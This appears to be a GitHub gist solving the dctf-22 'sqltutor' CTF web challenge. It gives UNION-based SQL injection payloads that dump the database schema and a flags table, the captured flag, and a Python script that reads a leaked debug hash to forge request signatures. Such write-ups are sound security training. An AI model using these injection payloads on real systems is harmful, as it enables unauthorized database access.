Skip to content

Instantly share code, notes, and snippets.

@krnbhargav

krnbhargav/commands.md

Created April 18, 2022 12:41
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save krnbhargav/ea23d3b81e54612f27458280d7fc98ca to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save krnbhargav/ea23d3b81e54612f27458280d7fc98ca to your computer and use it in GitHub Desktop.
Download ZIP
dctf-22 | web
Raw
commands.md

sqltutor

./exploit.py "admin' UNION ALL SELECT table_name,2,3,4 FROM information_schema.tables WHERE table_schema=database()#"

./exploit.py "admin' UNION ALL SELECT 1,column_name,3,4 FROM information_schema.columns WHERE table_name='flags'#"

./exploit.py "admin' UNION ALL SELECT id,flag,0,0 from flags#"

FLAG : dctf{Pump_7h3_s7r3am_h4s5_up!_353aa965}

Raw
exploit.py
# solution of sqltutor
#!/usr/bin/env python3
#from requests import *
from httpx import *
from base64 import *
import sys
url = "https://sqltutor.dragonsec.si/"
#proxies = {
# "http://":"http://127.0.0.1:8080",
# "https://":"http://127.0.0.1:8080"
#}
#client = Client(proxies = proxies)
client = Client()
def generate_hash(payload):
return client.post(url+"execute", data={"text":b64encode(payload.encode() ).decode(), "signature":"1","queryNo":"0","debug":"1"}).json()['debug']['compare'].split(" ")[0]
def send_payload(payload,_hash):
return client.post(url+"execute", data={"text":b64encode(payload.encode() ).decode(), "signature":_hash,"queryNo":"0","debug":"1"}).json()
if __name__ == "__main__":
payload = str(sys.argv[1])
data = send_payload(payload,generate_hash(payload))
print(data)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment